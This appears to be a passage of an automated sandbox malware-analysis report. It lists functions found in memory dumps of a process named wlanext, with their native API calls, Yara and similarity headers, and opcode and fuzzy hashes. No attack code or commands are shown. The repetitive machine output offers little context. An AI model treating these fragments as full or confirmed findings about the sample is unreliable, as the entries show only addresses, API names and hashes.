                                                                                        Function 0017C8A0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(00177320,001725EC,FFFFFFFF,00176E0A,00000206,?,00177320,00000206,00176E0A,FFFFFFFF,001725EC,00177320,00000206,00000000), ref: 0017C8E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                        • Instruction ID: 7bb5f5ae56e42c3f89fe76e659e480596303fb78169aaacec79def2aaedcaab8
                                                                                        • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                        • Instruction Fuzzy Hash: 91F0AFB2200208ABCB14DF89DC85EEB77ADEF8C754F118248BA0DA7241D630E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C9D0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00162D11,00002000,00003000,00000004), ref: 0017CA09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                        • Instruction ID: fbee9b61baebdac9add198249950d440462ed8c0fe8efad1b4f97e67f3ccb8cc
                                                                                        • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                        • Instruction Fuzzy Hash: 07F015B2200208ABCB18DF89DC85EAB77ADEF88754F018108BE0997241C630F810CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C9CA Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00162D11,00002000,00003000,00000004), ref: 0017CA09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: 3adc82e474bf7ea612b41e8e92983d4aeadebc022fc27032db594bc41ab1764e
                                                                                        • Instruction ID: 0b68003f92863d73f0b775efb871ed9d503fb6456c66045ee815ce5091eed93f
                                                                                        • Opcode Fuzzy Hash: 3adc82e474bf7ea612b41e8e92983d4aeadebc022fc27032db594bc41ab1764e
                                                                                        • Instruction Fuzzy Hash: 66F01CB5210119BBDB18DF98DC44E9B37ADEF88754F118248FA5997291C630E821CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C8EA Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtDeleteFile.NTDLL(00177122,00000206,?,00177122,00000005,00000018,?,?,00000000,00000206,?), ref: 0017C915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: d171579109472ddbe70e3ce032cd83c680d68eefcc844a89d2b01e95f487375c
                                                                                        • Instruction ID: ffd884f013bb98f26571de4637e4b92d74cb784787c6516ffc5b5ae4879a4f84
                                                                                        • Opcode Fuzzy Hash: d171579109472ddbe70e3ce032cd83c680d68eefcc844a89d2b01e95f487375c
                                                                                        • Instruction Fuzzy Hash: 60E08C36200114ABD710DB94DD89FD33729EF84310F024045B90DAB241C630E5018BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C8F0 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtDeleteFile.NTDLL(00177122,00000206,?,00177122,00000005,00000018,?,?,00000000,00000206,?), ref: 0017C915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                        • Instruction ID: 68a3ffaed1288f2c759378da65792b82a817af7ba674aae68c19af5873b6d279
                                                                                        • Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
                                                                                        • Instruction Fuzzy Hash: 4FD05E72200218BBD710EF98DC89FD77BACEF48B60F118455BA0D6B242C630FA008BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C920 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(001772FE,00000206,?,001772FE,00000005,FFFFFFFF), ref: 0017C945
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                        • Instruction ID: a10aa067b17bf6d21bc94499354866c3a691f89e95a97fcd14c5419226b54851
                                                                                        • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                        • Instruction Fuzzy Hash: BED05E72200218BBD714EFA8DC89FD77BACDF48B60F018155BA0D6B242C630FA008BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
                                                                                        • Instruction ID: 335214df4d5b41456217b03f8535f74051f87f063c6e0bcd80a3a0db2f5478ee
                                                                                        • Opcode Fuzzy Hash: 0817085d781d2e05ad367075ed978a984a16577f6ddd2b86cd3528cee871a78b
                                                                                        • Instruction Fuzzy Hash: 0F9002A1262042525A45B15964045074106A7E0382BA1D022A1414950C85669866E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
                                                                                        • Instruction ID: 9a3c58faf831501713a7faac86d6f7203fe7570b4759844caf6d2bb869c5526b
                                                                                        • Opcode Fuzzy Hash: 7001ba38825500b9d33a44d3e4e3cd78640de42d83b3797de7059699bf384c15
                                                                                        • Instruction Fuzzy Hash: 2F9002B122100513D61161596504707010997D0382FA1D422A0424558D96968962F161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
                                                                                        • Instruction ID: e4f029cec82d6a86c65a8120fe88f39695796ba7c84026680bd3696dca816ed5
                                                                                        • Opcode Fuzzy Hash: 6f5f82946adf09f22b69090f25e8795fcf5c11cd4b42d0197f6224135522f505
                                                                                        • Instruction Fuzzy Hash: D69002E136100542D60061596414B060105D7E1342F61D025E1064554D8659CC62B166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
                                                                                        • Instruction ID: 23b99a5d76061c61115c10ff5841c7415cc9d17ae5d7e6029e117488f08cb040
                                                                                        • Opcode Fuzzy Hash: 9c533a14d57357a33fbe53b705d508a269f1b8ea95e4c19ae081b33ba3abff7d
                                                                                        • Instruction Fuzzy Hash: BA9002F122100502D64071596404746010597D0342F61D021A5064554E86998DE5B6A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
                                                                                        • Instruction ID: 353db2684c5f20af564f5aec65a6ab38479d96a5e9e524f5d5cd4c149451af3b
                                                                                        • Opcode Fuzzy Hash: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
                                                                                        • Instruction Fuzzy Hash: 2F9002A123180142D70065696C14B07010597D0343F61D125A0154554CC9558871A561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
                                                                                        • Instruction ID: d63502936edb218a4910c52bed4b2ce5ee4ac5441caaf1539836562c0d2840eb
                                                                                        • Opcode Fuzzy Hash: b831c5b35d8ef2bb439e0de0724ca3431d5fd57bfbabbbf130ded90d525e2917
                                                                                        • Instruction Fuzzy Hash: 089002E122200103460571596414616410A97E0342F61D031E1014590DC56588A1B165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
                                                                                        • Instruction ID: 1873bbc5dcde0ee127bee4422d8bcf8025d61d33931aac1c51d680620f50be9b
                                                                                        • Opcode Fuzzy Hash: f4cc4ea42f04127c70e04a5ada7a5076231243e9972f10cbc26aa647a0ad6b94
                                                                                        • Instruction Fuzzy Hash: AB9002A5231001030605A5592704507014697D5392761D031F1015550CD6618871A161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
                                                                                        • Instruction ID: 271796278df357bad4deee0f44f57b5d62b325f31649b537bbdd0fe254fb7402
                                                                                        • Opcode Fuzzy Hash: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
                                                                                        • Instruction Fuzzy Hash: 839002A5231001020645A559260450B0545A7D63927A1D025F1416590CC6618875A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
                                                                                        • Instruction ID: 4780682ef170f8e50222bb57ffbcd7ba3295b6edb2a1d11f098e642bfa54ac91
                                                                                        • Opcode Fuzzy Hash: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
                                                                                        • Instruction Fuzzy Hash: 3A9002B122100942D60061596404B46010597E0342F61D026A0124654D8655C861B561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
                                                                                        • Instruction ID: 06d6e714a2f0dbb4eb5a8526b0483c5562b3a55c6497e6c389d6d846a350f0d0
                                                                                        • Opcode Fuzzy Hash: d79c2ae86764de82117a4ef9a569a22fe7aa38f112d47a0f13ac5e2438cd8c21
                                                                                        • Instruction Fuzzy Hash: C29002B122108902D6106159A40474A010597D0342F65D421A4424658D86D588A1B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 821a37884a28afcc691a6b74ef7fb56e8afda4201bf3c8aaae465b4c628aea19
                                                                                        • Instruction ID: a1deba772835ebc8eb9926afdab138cc49ffaf7ced165f235f97d793e4fb9952
                                                                                        • Opcode Fuzzy Hash: 821a37884a28afcc691a6b74ef7fb56e8afda4201bf3c8aaae465b4c628aea19
                                                                                        • Instruction Fuzzy Hash: 7A9002B122504942D64071596404A46011597D0346F61D021A0064694D96658D65F6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
                                                                                        • Instruction ID: 1fe9aad4998b0cdf3efb747b868e61de304b009c8d2e6f97425621f0c72b9746
                                                                                        • Opcode Fuzzy Hash: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
                                                                                        • Instruction Fuzzy Hash: 9F9002B122100902D6807159640464A010597D1342FA1D025A0025654DCA558A69B7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 461030f00d1e51ff4cae10bf6c95c11400887badac6404934e8083a3ef32544d
                                                                                        • Instruction ID: e9a53a37a919298c727a839c76d64a41f72ef9e8af3a1f754008b0b8921428a6
                                                                                        • Opcode Fuzzy Hash: 461030f00d1e51ff4cae10bf6c95c11400887badac6404934e8083a3ef32544d
                                                                                        • Instruction Fuzzy Hash: 8C9002B162500902D65071596414746010597D0342F61D021A0024654D87958A65B6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9c0404a3354994e8f09d15d0f5fd064eb5b7306acaf17acf6a6dd94438a447ca
                                                                                        • Instruction ID: 04f172d37548dfdb5678d9c9469622f095682201ad3e74545681784be15d5740
                                                                                        • Opcode Fuzzy Hash: 9c0404a3354994e8f09d15d0f5fd064eb5b7306acaf17acf6a6dd94438a447ca
                                                                                        • Instruction Fuzzy Hash: CF9002B133114502D6106159A404706010597D1342F61D421A0824558D86D588A1B162
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ccdcd734a3cccac4d1baf3e172f03c694fa2d2b9708145ad5fb67f2ff7ef8bbf
                                                                                        • Instruction ID: 79e8d9f5ccc4c20ce49d8cd6860ebb09924dcad1c3b7c357dd4ef679aa9cbfab
                                                                                        • Opcode Fuzzy Hash: ccdcd734a3cccac4d1baf3e172f03c694fa2d2b9708145ad5fb67f2ff7ef8bbf
                                                                                        • Instruction Fuzzy Hash: CC9002A923300102D6807159740860A010597D1343FA1E425A0015558CC9558879A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.572246911.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                        • Associated: 00000003.00000002.572817614.0000000000CDB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.572830036.0000000000CDF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_bc0000_wlanext.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: df4da7590279d9b1ea9e6dae23dbf6c6e4cbd652bd16a1c13a4b2c3b078c4170
                                                                                        • Instruction ID: 46bef9d59f4d37452178e888d57326a6ea4e2d066a6f5e773087eee242f0fb79
                                                                                        • Opcode Fuzzy Hash: df4da7590279d9b1ea9e6dae23dbf6c6e4cbd652bd16a1c13a4b2c3b078c4170
                                                                                        • Instruction Fuzzy Hash: C19002B122100502D60065997408646010597E0342F61E021A5024555EC6A588A1B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017B4C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0017B57B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
